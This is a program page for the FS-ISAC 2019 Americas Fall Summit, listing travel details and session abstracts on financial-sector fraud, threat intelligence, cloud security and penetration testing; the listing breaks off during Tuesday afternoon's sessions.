• Overview
  • Program
  • Sponsors

Enduring Strength

Trust. Transform. Together.

Stay at the forefront of trends and challenges facing the financial sector through our curated and enriched content.

Our thought-provoking and interactive sessions cover relevant topics including fraud, threat intelligence, resiliency, cloud and outsourcing. Build stronger relationships over three days with around 800 thought leaders, executives and members by sharing best practices.

Uniquely designed for the financial sector, the 2019 Americas Fall Summit will provide you with actionable information needed to address evolving threats, develop new strategies and meet changing regulations. 

Interested in sponsoring a speaking session or more during the Summit? Learn more here
Sessions are grouped into tracks. This year's tracks can be found here.

View the current agenda-at-a-glance.
Register Now

Members:

  • Platinum receive 10 complimentary passes
  • Gold receive five complimentary passes
  • Premier receive two complimentary passes

After all complimentary passes are utilized, additional staff may attend at a cost. 
Other membership tiers can attend at a cost.

Justify your trip

Summit Sponsorship

View Sponsor Prospectus or to learn more email sales@fsisac.com

Travel Information

Reserve Your Hotel Room

Marriott Marquis Washington D.C.
The cut-off date for our group hotel block has passed.  Reservation requests received after 25 October are on space, type, and price availability. Please see accommodations at a nearby hotel if not available at the Marriott Marquis.

Reserve your room today. 

Airports

Ronald Reagan Washington National Airport
Distance: 4 miles
Drive Time: 15-20 minutes 

Dulles International Airport 
Distance: 27 miles 
Drive Time: 45 minutes

Program

Sunday 17 November

Program Note

Speaker & Session Updates

As of 1 November, speaker or session changes will not be reflected here, but will be updated in ExOrdo and the Summit app.

Program Note

Repeated Sessions

The Americas Fall Summit agenda has some sessions that are repeated. This is not because of a lack of quality content, but because of a room-capacity issue at the venue. Repeated sessions comprise only member sessions that received the highest ratings from our Americas Content Committee. We have repeated these sessions to ensure that Summit attendees have ample opportunity to see these speakers. We hope you understand and appreciate your support of our programs.

4:00 PM

Registration

5:30 PM

Around the World Welcome Reception

Monday 18 November

10:15 AM

Opening Remarks

10:45 AM

Opening Keynote: Gonzo Infosec Journalist Tells All

Brian Krebs - Investigative Reporter

Event Toggle Arrow

BK_Headshot_v2

Brian Krebs is an independent investigative reporter who writes about cybercrime at the award-winning Web site KrebsOnSecurity.com.

Formerly with The Washington Post (1995 to 2009), Krebs is probably best known for breaking stories on high-profile data breaches, including those that hit Target, Home Depot, Michaels and Ashley Madison.

A frequent interviewee and public speaker, Krebs has been profiled by 60 Minutes, The New York Times, Poynter.org and Business Week. Krebs’s book, Spam Nation: The Inside Story of Organized Cybercrime - From Global Epidemic to Your Front Door – is now a New York Times bestseller.

In January 2015, the National Press Foundation announced it was awarding Krebs its Chairman's Citation, an award designed to "recognize individuals whose accomplishments fall outside the traditional categories of excellence." In October 2014, the Association of Certified Fraud Examiners gave Krebs the "Guardian Award," an honor given annually to a journalist "whose determination, perseverance and commitment to the truth have contributed significantly to the fight against fraud."

Krebs graduated in 1994 from George Mason University, where he earned a Bachelor of Arts in International Studies.

 

11:30 AM

Fighting BEC Cybercrime at Scale

Mr. Crane Hassold, Agari

Event Toggle Arrow

Phishing via non-technical social engineering methods such as business email compromise costs businesses $1.2 billion a year. Presenters will cover why phishing is so effective and how cybercriminals have evolved their tactics to exploit organizations' weakest defenses — humans. Attendees will gain insights into the latest research into cybercrime organizations and get an overview of how the industry can thwart emerging phishing threats through collaboration with financial institutions and law enforcement.

12:00 PM

Lunch

1:00 PM

How ERP Risks Are Leaving Your Business Exposed to Fraud

Mr. Jason Fruge, Onapsis, Inc.

Event Toggle Arrow

A recent survey of IT executives of 430 North American organizations found that 70 percent of those companies suffered a breach of their Enterprise Resource Management (ERP) systems in the last two years. Attendees will explore five of the most common vulnerabilities impacting ERP and how they can be exploited to modify financial systems and inform insider trading. The session will also review how cybersecurity professionals can collaborate with IT, application and GRC teams to assess their organization's exposure to those material risks.

1:00 PM

Compliance in Cloud: Paced Migration is Key

Mr. Amandeep Lamba, PwC and Mr. Rinaldi Rampen, Fannie Mae

Event Toggle Arrow

When presented with the benefits of cloud, many companies attempt to transition too quickly and don't fully consider how their migration will impact security, operational risk and compliance requirements. In this session, attendees will explore how to manage risks using a "go slow-to-go fast" strategy that focuses on understanding how migration will affect their security and compliance profile. Presenters will also provide advice on establishing necessary governance and controls before migration take place.

1:00 PM

The Evolution of Authentication

Mr. Bojan Simic, HYPR and Mr. Ed Amoroso, TAG

Event Toggle Arrow

As enterprises move to the cloud, the perimeter fades and the attack surface gets larger. Modern tools such as SNIPR and Modlishka have made it easier for hackers to launch large-scale automated attacks, bringing credential re-use and two-factor-authentication attacks to record highs. How did we get here, and will mainstream adoption of password-less security have a positive or negative impact? This session explores how the rise of virtual desktop infrastructure has affected workstation login and reviews how the evolution of authentication has impacted enterprises' identity-and-access-management systems.

1:00 PM

Protecting your Riskiest Asset in the Cloud: Office 365

Mr. Kenneth Crist, GEICO

Event Toggle Arrow

Close to 90 percent of breaches include a phishing or pretexting component, with email as a primary vector. Between these threats and business email compromise, many view cloud-based email as too risky. As organizations move their email from on-premises to cloud-based, they must reevaluate security controls. This session will highlight the challenges and solutions Geico discovered to securing the cloud. Attendees will gain a better understanding of the choices available for cloud security such as networking, conditional access, classification, email protection, authentication and encryption within Office 365.

1:00 PM

CyberSaucier: The Automated Army of Cyber Analysts

Mr. Justin Borland, Barclays and Mr. David Heise, Barclays

Event Toggle Arrow

CyberSaucier allows security operations teams to apply complicated de-obfuscation and enrichment routines to arbitrary data sources, en masse. Security operations teams can build on their knowledge by running alert data against hundreds of recipes in near real-time. At Barclays, CyberSaucier is helping triage millions of alerts per week, providing the output of more than 200 cyber-analysts working 24/7. Whether it's WAF logs, IDS alerts, web logs or raw packet data, presenters will share how CyberSaucier can automate enhancement of incidents and alerts, allowing analysts to focus on previously unseen attacks. Attendees will understand how to apply this analysis pipeline to their own data.

1:00 PM

S&P's Journey to Build a Security-First Culture

Mr. Aaron Katz, SP Global and Ms. Megan Kaczanowski, SP Global

Event Toggle Arrow

Security teams often feel they are fighting a losing battle against their users. Developers don’t listen and business leaders just accept risk. It’s not that users don’t care; it’s that they lack context to understand why they should care. This session explores how one corporation was able to take a small presentation about cybersecurity risks and turn it into a security champions program by engaging and empowering developers and business leaders to understand why security is so important. Attendees will leave with actionable tips for implementing similar programs in their own organizations.

1:00 PM

Synthetic Identities and Entities: Chasing Fraudulent Ghosts

Mr. Steve Lenderman, ADP

Event Toggle Arrow

Synthetic identities are the biggest threat to the financial sector since identity theft boomed in the 1990s. This session explores the foundation of credit, the regulatory environment and how the current credit bureaus and data aggregators are manipulated to create synthetic identities. Attendees will review the underlying datapoints that build financial identities, data sources that aggregate them and how fraudsters are leveraging this information.

1:00 PM

Threat-Driven Network Defense at Scale

Mr. Harley Parks, The Johns Hopkins Applied Physics Laboratory

Event Toggle Arrow

In today’s evolving and complex threat landscape, there’s a desire to automate, share and detect and respond to as much as possible ⁠— as fast as possible. Attendees will hear how to do so in a way that increases the effectiveness of operations. Presenters will share lessons learned from experiments aimed at defining ways to share adversary TTPs optimized for network defenders and defensive workflows for TTP investigation and mitigation.

1:00 PM

The Prospective of a Russian Cyber Threat to the Financial Sector

Mr. Levi Maxey, FSARC and Mr. Samuel Alexander, Fannie Mae

Event Toggle Arrow

This FSARC Intelligence briefing – a product of collaboration between the FSARC Intelligence Team, FSARC member firms, FS-ISAC, and US government partners – examines Russia’s strategic intentions as well as the Russian government’s cyber capabilities and historical targeting of critical infrastructure, particularly the financial sector. This briefing outlines the geopolitical circumstances in which Russia may seek to cause destabilizing impacts to the US financial sector through cyber means and suggests a series of Watch Items designed to indicate developments that could in aggregate or alone indicate Russia’s intentions to engage in disruptive or destructive cyber operations against US financial sector targets with potentially systemically cascading harm to US economic stability and national security. This assessment provides context for financial sector decision-makers to understand the possible systemic threat from Russian state-sponsored cyber campaigns and info rm security within their respective institutions.

 
2:00 PM

Securing and Governing Azure Workloads

Ms. Lisa Lee, Microsoft

Event Toggle Arrow

How can a business be sure its securely operating workloads in the cloud? Your team may have the skills and maturity, but what sources should you be relying on for your configurations? Attendees will identify valuable resources that can help businesses secure and govern Azure cloud workloads, as well as needed reference documents, such as benchmarks, for secure deployment. Attendees will review blueprints, specifically designed for FFIEC and PCI compliance, to accelerate certification and compliance and create consistent and repeatable environments.

2:00 PM

Rising Digital Platforms and the API Economy

Mr. Joe Diamond, Okta, Mr. Charlie Jacco , KPMG, and Mr. Vishnu Allaparthi , PWC

Event Toggle Arrow

Digital experiences and API-driven innovation is the future of banking and finance. Consumers are demanding the ability to connect to financial service providers through online and mobile channels with anytime, anywhere accessibility. Forward-thinking companies are partnering with non-traditional players to offer new products and services and deploy APIs to build integrated application ecosystems. In this session, attendees will discuss the challenges and implications of shifting toward digital platforms and reaching untapped markets.

2:00 PM

Optimizing Workflow via Fusion of Threat Intel and Incident Response

Ms. Katie Kusjanovic, EclecticIQ

Event Toggle Arrow

In financial services, there are more fusion centers than SOCs. With this matured evolution, the divergent workflows of threat intelligence practitioners and incident response analysts have begun to overlap and converge. The progression of threat intelligence in the fusion center is a primary contributor to the blurring lines. Attendees will dissect an abstracted version of the previous generation threat intelligence and incident-response disciplines and explore how the two workflows can cooperate in the context of a breach.

2:00 PM

Reducing Risk Through Sender ID Authentication

Mr. Alexander García-Tobar, Valimail and Mr. Shaun Khalfan, Freddie Mac

Event Toggle Arrow

Sender identity, or lack thereof, is the key to slipping past current email defenses. According to a March, 2019 study from Barracuda, 83% of all phishing attacks involve brand impersonation — and another 6% were impersonations of trusted individuals, like your CFO. Another report from July 2019, from Great Horn, found that 43% of email attacks were impersonations of people trusted by the recipient, and that this was the most effective type of phishing attack. While most attempts to stop this kind of phishing focus on user training, this approach just winds up blaming the victim. There is a better solution: Validating sender identity. This session reviews how Freddie Mac implemented a cloud-based sender identity solution that does not require exposing any personal information from the contents of email messages.

2:00 PM

Save the Person, Save the Bank

Mr. Scott Alston Bank of America and Mr. Edward Traywick, Bank of America

Event Toggle Arrow

When it comes to insider threats, much attention is focused on reacting to an incident. Save the person, save the bank is a concept designed to benefit not only an organization, but also its employees. In an effort to move toward a more pre-emptive model, the primary emphasis should be on educating the workforce on how to recognize and report signs of employees who may be experiencing significant distress—while protecting the individual’s privacy. Attendees will hear how by taking this proactive approach, the bank is helping to prevent potential malicious acts, mitigate risk and reinforce that it cares about its people.

2:00 PM

Actually Achieving Diversity

Mr. Jonathan Shiflet, PNC Financial Group, Mr. Samuel Strohm, PNC Financial Group, and Ms. Annie Howard, PNC Financial Group

Event Toggle Arrow

Everyone agrees that having a diverse team improves performance, yet many banks struggle with executing on this. PNC’s Security Defense Office more than meets the current industry standard of 20 percent diversity in the workforce and 4 percent diversity in leadership roles. This session reviews how one bank fostered an inclusive culture to attract and retain diverse candidates. By prioritizing curiosity and drive and leveraging core subject matter experts to train new hires, the institution’s security defense office built an industry-leading intelligence unit, a growing security operations center and a mature attack surface management pillar.

2:00 PM

(Repeat) Synthetic Identities and Entities: Chasing Fraudulent Ghosts

Mr. Steve Lenderman, ADP

Event Toggle Arrow

Synthetic identities are the biggest threat to the financial sector since identity theft boomed in the 1990s. This session explores the foundation of credit, the regulatory environment and how the current credit bureaus and data aggregators are manipulated to create synthetic identities. Attendees will review the underlying datapoints that build financial identities, data sources that aggregate them and how fraudsters are leveraging this information.

2:00 PM

(Repeat) S&P's Journey to Build a Security-First Culture

Mr. Aaron Katz, SP Global and Ms. Megan Kaczanowski, SP Global

Event Toggle Arrow

Security teams often feel they are fighting a losing battle against their users. Developers don’t listen and business leaders just accept risk. It’s not that users don’t care; it’s that they lack context to understand why they should care. This session explores how one corporation was able to take a small presentation about cybersecurity risks and turn it into a security champions program by engaging and empowering developers and business leaders to understand why security is so important. Attendees will leave with actionable tips for implementing similar programs in their own organizations.

2:45 PM

Networking Break

3:15 PM

Implementing Security Metrics that Matter

Mr. Nik Whitfield, Panaseer

Event Toggle Arrow

Financial institutions must use metrics to understand how assets and controls are measured and reported. Attendees will hear how FIs are implementing continuous controls, including an accountability matrix for business areas and controls to improve metrics, illustrating how to overcome initial politics and disruption tactics. Presenters will also explain the value role-based metrics play in reducing risk and the concepts behind the Security Knowledge Graph and entity-centric risk.

3:15 PM

The SOC Triad: Creating Functional Harmony

Mr. Chris Morales, Vectra

Event Toggle Arrow

In music, a triad is a set of three notes (or pitch classes) that can be stacked vertically in thirds to create a “harmonic triad.” In security operations, the SOC triad provides greater visibility into your environment by harmonizing three distinct capabilities – NDR, EDR and SIEM – reducing the likelihood of a bad actor staying hidden for an extended period of time. This session explores how Dun & Bradstreet’s security operations designed a SOC visibility triad to gain visibility across data centers and global office locations, while also integrating that approach into day-to-day operational practices. This discussion delivers practical best practices that offer SOCs increased threat visibility, detection, response, investigation and remediation powers.

3:15 PM

(Repeat) Protecting your Riskiest Asset in the Cloud: Office 365

Mr. Kenneth Crist, GEICO

Event Toggle Arrow

Close to 90 percent of breaches include a phishing or pretexting component, with email as a primary vector. Between these threats and business email compromise, many view cloud-based email as too risky. As organizations move their email from on-premises to cloud-based, they must reevaluate security controls. This session will highlight the challenges and solutions Geico discovered to securing the cloud. Attendees will gain a better understanding of the choices available for cloud security such as networking, conditional access, classification, email protection, authentication and encryption within Office 365.

3:15 PM

Industry vs. Fraudsters: Who’s Winning the Battle for Payments?

Mr. Jim Cunha, Federal Reserve Bank of Boston

Event Toggle Arrow

Synthetic identities are increasingly used to commit payments fraud, yet this type of fraud can be difficult to prevent or detect. Inconsistencies in definitions and detection approaches leave the industry with little capacity to identify and address payments fraud trends on a timely basis. During this session, attendees will hear from Senior Vice President of Treasury and Financial Services, Jim Cunha, on the work being done to better understand and battle this fast-growing threat to the U.S. payment system.

3:15 PM

Successfully Building a TIP

Mr. Jonathan Shiflet, PNC Financial Group, Mr. Adam Perino, Wells Fargo and Mr. Shahan Sudusinghe, JPMC

Event Toggle Arrow

It’s become industry standard for intelligence organizations to acquire or build a Threat Intelligence Platform (TIP). Acquiring a TIP is only half of a complicated, difficult struggle toward automated intelligence operations. This presentation will cover key milestones and the stumbling blocks to avoid to effectively deploy a TIP. Presenters will also discuss choosing the right tool for your environment and organization and getting the TIP to not only ingest, but also produce, actionable intelligence across multiple customers.

3:15 PM

Traveling is Risky Business: Developing a High-Risk Travel Program

Ms. Deborah Janeczek, American Express and Aaron Brown, American Express

Event Toggle Arrow

Cyberthreats increase as organizations grow and do business in high-risk countries. To combat threats, information security and risk personnel need to work with their institution to develop a high-risk travel program. In this session, presenters will share how their company developed its high-risk travel program, including how to determine high-risk countries and educate business travelers, while protecting and monitoring corporate devices.

3:15 PM

Making Cloud the Most Secure Environment for Financial Services

Mr. Rajiv Gupta, McAfee and Dr. Alissa Abdullah, Mastercard

Event Toggle Arrow

For financial institutions, developing an innate understanding of where and how they could encounter cyber-risk is of primary importance. Security teams must continuously strive to fulfill their fiduciary and regulatory responsibilities, while also meet increasing expectations for consumer privacy and innovative business solutions. In this session, presenters will cover best practices for securing the cloud, starting with visibility and control of cloud and web services and understanding which cloud services are in use and how.

 
3:15 PM

Lessons Learned from Building an External Engagement Intel Program

Mr. Sam Alexander, Fannie Mae

Event Toggle Arrow

This presentation will explore Fannie Mae's development and operation of an external engagement program within Fannie Mae's Cyber Intelligence Team. It will discuss our experiences in building relationships with a variety of government stakeholders and sector partners, collection and processing of threat intelligence data from these sources, as well as analysis and feedback of data received from government and sector sources. We will also explore how we created a return on investment to traditionally less prioritized sources of information, such as classified briefings and participation in formal government sponsored information sharing programs. Finally, we will explore Fannie Mae's effort to build collaborative information sharing relationships with small and medium financial institutions that leverage it's Desktop Underwriter service in order to raise the security posture across the mortgage industry and develop relationships before a threat event occurs. 

 
4:15 PM

Silver Showcase: Hardware-Enforced Web Isolation

Mr. James Derbyshire, Garrison Technology

4:15 PM

Silver Showcase: Destructive Malware – Lessons from the Trenches

Mr. Charles DeBeck, IBM

4:15 PM

Silver Showcase: Stopping Malicious Automated Bots with Innovative Strategies

Mr. Shreyans Mehta, Cequence Security

4:15 PM

Silver Showcase: Freezing Financial Fraud: Putting Theft through Email on Ice

Mr. Bhagwat Swaroop, Proofpoint, Inc.

4:15 PM

Silver Showcase: Banks Can Optimize Resources, Reduce Risk with SOAR

Mr. Greg Bammel, Swimlane

4:15 PM

Silver Showcase: Not Your Average TIP: Meet Scout Threat

Mr. Dan Martin, LookingGlass Cyber Solutions

4:15 PM

Silver Showcase: Client-Side Website Security - A Threat to E-Commerce

Mr. Aanand Krishnan, Tala Security

5:15 PM

Reception

7:00 PM

Signature Event Dinner

Tuesday 19 November

7:00 AM

Breakfast

8:00 AM

Opening Remarks

8:15 AM

Threat Hunting at Speed and Scale

Mr. Will Farrell, Booz Allen Hamilton, Mr. Jay Novak, Booz Allen Hamilton and Ms. Lauren Clark, Thomson Reuters

Event Toggle Arrow

Threat hunting is a powerful tool in an intelligence-centric security operations team. However, many teams take an unstructured approach, which takes more effort to find the adversary, than it does for the adversary to change its TTP. By implementing a process around use case creation, capturing and reusing hunt trade craft and focusing on best sources of data, teams can reduce the cost of the hunt team. In this session, attendees will learn how to transform hunt operations by leveraging endpoint detection and response telemetry data and review detailed analysis of vendor-agnostic hunt-use cases.

8:45 AM

3 Musts to Reduce the Infrastructural Attack Surface

Mr. Tom Gillis, VMware

Event Toggle Arrow

The biggest challenge to safeguarding against threats that get past perimeter defenses remains the industry’s hyper-focus on reacting to threats, instead of identifying new ways to shrink the attack surface. IT leaders must make gains in accurately characterizing modern applications and then use that understanding to harden the underlying infrastructure. Attendees will review how defenders can approach perimeter defense more proactively.

9:45 AM

Networking Break

10:00 AM

Hacking Misconceptions: Lessons Learned Building a Penetration Testing Program

Mr. Sean O'Coiligh, DTCC

Event Toggle Arrow

Addressing the initial challenges experienced with the implementation and maturing of a program and its optics, perceptions, metrics, compliance, reporting, driving remediation, collaboration with other teams, dealing with audit, defining and demonstrating value, and defining what "penetration testing" is in our environment.

10:00 AM

Could Hackers Solve the Cybersecurity Skills Shortage?

Mr. Luke Tucker, HackerOne

Event Toggle Arrow

While there are many theories around why there’s a cybersecurity skills gap, there are only a few solutions offered. Attendees will discuss how organizations can fill cybersecurity gaps by looking beyond traditional channels, toward hackers themselves. By the end of 2020, more than 1 million hackers are expected to be registered as part of the self-employed workforce.

10:00 AM

Questions Every CEO Should Ask about Cyber Risks

Mr. Jonathan Halperin, Cybersecurity and Infrastructure Security Agency (DHS)

Event Toggle Arrow

Cyberthreats affect businesses of all sizes and require the attention and involvement of CEOs and other senior leaders. To help companies understand their risks and better prepare for cyberthreats, CEOs should discuss key cybersecurity risk management topics with their leadership and implement cybersecurity best practices. Presenters will share best practices from CISA guidance, “Questions Every CEO Should Ask About Cyber Risks,” based on lessons learned from incident response activities and managing cyber-risk.

10:00 AM

From Admin to Endpoint: Beating Security Systems

Mr. Etay Maor, Intsights

Event Toggle Arrow

Cybercriminals have been at war with security systems for over a decade. However, the cat and mouse game between attackers securing a system, finding a hole, and taking advantage of it does not seem to have an end in sight. Research of Dark Web forums has revealed an uptick in a new type of offering: Admin accounts. These accounts are auctioned and sold in closed forums for thousands of dollars. In this session we will explore these offerings from three perspectives: (1) The actual offering on the Dark Web. We will take a tour of several underground markets and expose what they offer. (2) The defenders. We will discuss why security systems fail when it comes to anomaly and threat detection. We will look at the techniques cybercriminals use to bypass different types of solutions and processes. (3) The target. We will demonstrate how, using OSINT, attackers can collect a wealth of information and create a full intel package targeting admins. Admins are humans too – they fall for social engineering, phishing and other scams.

 
10:00 AM

Leveraging MITRE's ATT&CK Framework to Transform Cyber Defense

Mr. Kenneth Crist, GEICO

Event Toggle Arrow

MITRE's ATT&CK framework is widely used; however, tangible ways to apply ATT&CK have proven problematic. Presenters will discuss how their organization adopted ATT&CK as its central framework for guiding its threat defense strategy. They will review how Geico leverages ATT&CK to track threat actors, guide security spending, predict the (near) future, save limited resources and measure program efficacy. Beyond simply an overview and organizational structure, attendees will identify implementation issues, current progress and lessons learned.

10:00 AM

Synthetic Identity: Are You Who You Say You Are?

Mr. Kevin Thomsen, Bank of America

Event Toggle Arrow

This session provides attendees with an overview of synthetic identity; a combination of fabricated credentials where the implied identity is not associated with a real person. Presenters will explain how fraudsters are exploiting this gap for financial gain and why synthetic identity is a blind spot for some financial institutions, due to organizational structure. The session will conclude with the latest on what’s being done at the industry-level and a high-level overview of what the banks are doing to mitigate risk.

10:00 AM

The Network Perimeter Protection Tool Known as Jack-a-Mole

Mr. Yu Peng, Intercontinental Exchange and Mr. Paul Braxton, Intercontinental Exchange

Event Toggle Arrow

Since the dawn of internet security, firms have struggled to react effectively to offensive IP addresses. Additionally, the amount of data teams need to proactively block IP addresses has increased exponentially with the maturation of information sharing communities, threat intelligence and ever-increasing IOC ingestion. Presenters will go over the design, implementation and tuning of a behavior and reputation-based network perimeter protection tool called Jack-a-Mole (JAM.) Attendees will hear about the challenges and compromises required for successful execution.

11:00 AM

Building the Bridge between Security and the Business

Ms. Jennifer Gagnon, PNC Bank and Ms. Kathleen Darroch, PNC Bank

Event Toggle Arrow

Security teams are looked at as a cost center, whereas the business side of the bank brings in the money. This session will focus on building relationships between the two. Attendees will review techniques and use-cases that helped PNC break down walls between departments and build partnerships among fraud, cyber and the business. Presenters will also discuss how security teams can actually help the business team engage customers in ways that turn security from a cost center to a revenue generator.

11:00 AM

(Repeat) Questions Every CEO Should Ask about Cyber Risks

Mr. Jonathan Halperin, Cybersecurity and Infrastructure Security Agency (DHS)

Event Toggle Arrow

Cyberthreats affect businesses of all sizes and require the attention and involvement of CEOs and other senior leaders. To help companies understand their risks and better prepare for cyberthreats, CEOs should discuss key cybersecurity risk management topics with their leadership and implement cybersecurity best practices. Presenters will share best practices from CISA guidance, “Questions Every CEO Should Ask About Cyber Risks,” based on lessons learned from incident response activities and managing cyber-risk.

11:00 AM

Ripple Effects from Breaches and Disruptions in the Finance Sector

Mr. Kelly White, RiskRecon

Event Toggle Arrow

Many published studies offer statistics about breaches that directly impact financial organizations. But very little analysis has been done on the long-term, downstream “ripple effects" associated with those breaches. This session reviews analysis of more than 70,000 security incidents, including a deep dive into over 800 that contain detailed information about the breadth of the ripple effects, the firms impacted, the firms that trigger these security incidents and the associated financial losses.

11:00 AM

(Repeat) Hacking Misconceptions: Lessons Learned Building a Penetration Testing Program

Mr. Sean O'Coiligh, DTCC

Event Toggle Arrow

Addressing the initial challenges experienced with the implementation and maturing of a program and its optics, perceptions, metrics, compliance, reporting, driving remediation, collaboration with other teams, dealing with audit, defining and demonstrating value, and defining what "penetration testing" is in our environment.

11:00 AM

(Repeat) Leveraging MITRE's ATT&CK Framework to Transform Cyber Defense

Mr. Kenneth Crist, GEICO

Event Toggle Arrow

MITRE's ATT&CK framework is widely used; however, tangible ways to apply ATT&CK have proven problematic. Presenters will discuss how their organization adopted ATT&CK as its central framework for guiding its threat defense strategy. They will review how Geico leverages ATT&CK to track threat actors, guide security spending, predict the (near) future, save limited resources and measure program efficacy. Beyond simply an overview and organizational structure, attendees will identify implementation issues, current progress and lessons learned.

11:00 AM

FS-ISAC Information Sharing Best Practices Document & Practical Tips

Mr. Kyle Davis, Target Corporation and Mr. John Suver, Bank of America

Event Toggle Arrow

This presentation will introduce members to the FS-ISAC Information Sharing Best Practices document, which will be newly updated in time for the Fall Summit.   In addition, the presentation will discuss practical approaches to overcoming common obstacles and objections related to information sharing.

 
11:00 AM

High-Impact Strategies to Close the Visibility Gap in Security

Mr. Joe Partlow, ReliaQuest

11:45 AM

Innovative Showcase Lunch: Firmware: The Unprotected Attack Surface

Mr. Yuriy Bulygin, Eclypsium

11:45 AM

Innovative Showcase Lunch: Identity: The Key to Modernization and Unlocking Innovation

Mr. Richard Bird, Ping Identity

11:45 AM

Innovative Showcase Lunch: Security Instrumentation Is the Future of All Software

Mr. Jeff Williams, Contrast Security

11:45 AM

Innovative Showcase Lunch: Intercepting the Hack and Controlling Outcomes

Ms. Neill Sciarrone, Trinity Cyber Inc

11:45 AM

Innovative Showcase Lunch: Keys to the Cloud (and Everything Else)

Mr. David Greene, Fortanix

11:45 AM

Innovative Showcase Lunch: Fighting Cyber Attacks With Game Theory

Mr. Michael Fabrico, TrapX

1:15 PM

Today's Fraud Prevention Requires More Than Mere Bot Mitigation

Mr. Dan Woods, Shape Security

Event Toggle Arrow

Fraud losses from account takeover and imitation attacks are on the rise, as is the security community’s understanding of these threats. Sixty-five percent of all traffic on banks’, credit-card issuers’ and money transmitters’ websites is non-human; but highly motivated and technical attackers are evolving beyond bots. This session will review how aggregators, man-in-the-browser attacks and manual labor are contributing to automation threats in a more costly and effective way.

1:15 PM

Use-Case for Simplifying Cybersecurity Regulatory Compliance

Ms. Nadya Bartol, BCG Platinion, Mr. Josh Magri, Bank Policy Institute - BITS, Mr. John Goodman, PenFed and Ms. Helene Kramer, DTCC

Event Toggle Arrow

This session discusses the use-case for how adoption of the Financial Services Cybersecurity Framework Profile can simplify regulatory compliance and reduce costs. This profile is a scalable and extensible framework that financial institutions of all types can use for cyber-risk management, as well as a mechanism to evidence compliance with multiple regulations, including the FFIEC's CAT and HKMA's CRAF. It is based on NIST CSF and is compatible with ISO/IEC 27001 and 27002, and was developed over a two-year period by a coalition of various trade associations and 150 financial institutions. A brief description of the profile will be reviewed in this session, as will plans for its maintenance. Attendees can expect to gain a better understanding of how they can adopt the profile at their institutions to manage multiple regulatory drivers, improve cyber-risk management, and reduce compliance costs.

1:15 PM

(Repeat) Building the Bridge between Security and the Business

Ms. Jennifer Gagnon, PNC Bank and Ms.Kathleen Darroch, PNC Bank

Event Toggle Arrow

Security teams are looked at as a cost center, whereas the business side of the bank brings in the money. This session will focus on building relationships between the two. Attendees will review techniques and use-cases that helped PNC break down walls between departments and build partnerships among fraud, cyber and the business. Presenters will also discuss how security teams can actually help the business team engage customers in ways that turn security from a cost center to a revenue generator.

1:15 PM

Partnering Offense and Defense: A Purple Team’s Journey

Mr. Chris Blow, Liberty Mutual and Mr. Brian Riley, Liberty Mutual

Event Toggle Arrow

Internal red and purple teaming have seen a large uptick in popularity within the past five years. Unfortunately, not all implementations are successful for reasons ranging from budgetary and scope constraints, lack of forward-thinking vision, executive buy-in and structure. In this session, Liberty Mutual Insurance will share its purple team journey and how it’s driven material improvements toward its security program. Attendees will gain knowledge that will assist in creating a successful team of their own.

1:15 PM

Detecting Debit Card Fraud with Hands-On Data Science

Mr. Salil Jain, Aetna and Mr. Heath Henry, Aetna

Event Toggle Arrow

Security vulnerabilities in a merchant or card processor’s payment card network can leave room for threat actors to exploit them. Data breaches are nearly impossible to detect until hackers begin using the cards for fraudulent purchases. This session will review how probabilistic correlation, Jaccard (similarity) index, a measure of similarity for two sets of data, and manual investigation have helped mitigation efforts to protect issuers from fraud.

1:15 PM

Making a Cyber Awareness Program Sexy

Mr. Mandouh Csintalan, RenaissanceRe

Event Toggle Arrow

Security often struggles to capture the attention of other departments. But when a security incident occurs, security teams get all of the attention, and oftentimes the blame. This session reviews how security departments can push cyber-awareness programs within their organizations before an incident happens. The financial-services industry is among the most targeted for sophisticated cyber-attacks. We must train colleagues to be an extension of our cyber-army to thwart attacks.

1:15 PM

Fraud Working Group Update -> Security/Fraud convergence

Mr. Matt Harper, Aflac

Event Toggle Arrow

Continue fraud working group conversation around the conversion of Security and Fraud as well as other emerging topics. 

 
2:15 PM

Using Behavior Analytics to Predict, Detect and Stop Insider Threats

Mr. Bryan Sheppard, State Farm

Event Toggle Arrow

Conventional cybersecurity tools, such as those aimed at data-loss prevention, intrusion-prevention, security-information and event-management, and network-monitoring, focus on defending the perimeter and offer little in the way of protecting against insider threats. IT security teams cannot monitor every action taken by every employee, consultant and privileged user, using manual processes. In this session, attendees will explore State Farm’s insider threat program and learn how the company’s user and entity behavior analytics platform compares real-time user behavior to base-lined, normal behavior.

2:15 PM

Consequences of E-Commerce and External Suppliers on the Web

Mr. Brandon Dixon, RiskIQ

Event Toggle Arrow

As the e-commerce side of businesses have grown, so have their functionality and services. Websites have heavily relied on ads, analytics and other outsourced services as part of the expansion, without being heavily scrutinized. Attendees will hear how e-commerce supply chain attacks often start, play out and impact organizations with limited insight into these events.

2:15 PM

(Repeat) Detecting Debit Card Fraud with Hands-On Data Science

Mr. Salil Jain, Aetna and Mr. Heath Henry, Aetna

Event Toggle Arrow

Security vulnerabilities in a merchant or card processor’s payment card network can leave room for threat actors to exploit them. Data breaches are nearly impossible to detect until hackers begin using the cards for fraudulent purchases. This session will review how probabilistic correlation, Jaccard (similarity) index, a measure of similarity for two sets of data, and manual investigation have helped mitigation efforts to protect issuers from fraud.

2:15 PM

Applied Innovation to Reduce Risk in Access Management

Ms. Neha Joshi, Accenture Security and Mr. John Denning, Bank of America

Event Toggle Arrow

As corporate environments become more complex, dynamic and data-driven, Access Management programs need to eliminate manual processes and use predictive analysis to maintain the currency of their controls. Attendees will review the journey one financial institution took by applying innovation to uncover access risk and explore the necessary steps to mitigate risk. Attendees will also learn how to introduce automation and analytics to increase efficiency and accuracy, while reducing risk to their organization.

2:15 PM

(Repeat) FS-ISAC Information Sharing Best Practices Document & Practical Tips

Mr. Kyle Davis, Target Corporation

Event Toggle Arrow

This presentation will introduce members to the FS-ISAC Information Sharing Best Practices document, which will be newly updated in time for the Fall Summit.   In addition, the presentation will discuss practical approaches to overcoming common obstacles and objections related to information sharing.

 
2:15 PM

What to Expect When Expecting a Pen Test

Mr. Tony Drake, Intercontinental exchange / NYSE

Event Toggle Arrow

Penetration Tests. We all do them. The regulators require them. The board wants to see them. But they are taking more time, more resources and more effort. So how do we move from just ticking a box and saving a report, to a test that creates value and moves the needle on security and your security program as a whole? This session starts from the basic premise that you're already doing a pen-test and then walks through pen-testing from inception to planning, execution, followup and remediation. This session aims to lay out the pitfalls and traps that await any pen-testing plan and how to avoid them.

 
2:15 PM

Risk Management & Technology Can Be Friends

Mr. William Bailey, Police & Fire FCU

Event Toggle Arrow

